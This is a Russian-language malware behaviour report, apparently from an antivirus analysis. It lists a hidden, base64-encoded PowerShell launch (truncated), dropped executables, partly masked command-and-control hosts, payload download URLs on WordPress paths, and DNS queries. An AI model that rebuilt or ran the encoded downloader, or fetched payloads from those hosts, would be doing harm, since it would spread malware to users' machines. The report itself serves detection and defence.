Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABDAGYAbQB3AG0AcABwAG0AdwBnAD0AJwBLAGEAbABjAGIAaAB1AHMAawBhAGsAdAAnADsAJABSAGUAbQB6AHoAZwBtAGgAbQB1AGgAIAA9ACAAJwA4ADAAMAAnADsAJABUAHgAdQBuAGoAcwBjAHQAZABzAD0AJwBCAG0AYgB2AHgAawB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\1303949.cvr
- %HOMEPATH%\800.exe
- %HOMEPATH%\800.exe
- 'so###astor.com':80
- '20#.#09.113.155':80
- 'si####ichangjia.com':80
- 'si####ichangjia.com':443
- http://so###astor.com/wp-admin/7hk-x0f-5297067036/
- http://20#.#09.113.155/bettertools/OUlfBiwW/
- http://www.si####ichangjia.com/wp-content/cbwad92-76730cx-31019/
- 'si####ichangjia.com':443
- DNS ASK re###aelpc.es
- DNS ASK de###.upandatom.biz
- DNS ASK so###astor.com
- DNS ASK si####ichangjia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABDAGYAbQB3AG0AcABwAG0AdwBnAD0AJwBLAGEAbABjAGIAaAB1AHMAawBhAGsAdAAnADsAJABSAGUAbQB6AHoAZwBtAGgAbQB1AGgAIAA9ACAAJwA4ADAAMAAnADsAJABUAHgAdQBuAGoAcwBjAHQAZABzAD0AJwBCAG0AYgB2AHgAawB... (со скрытым окном)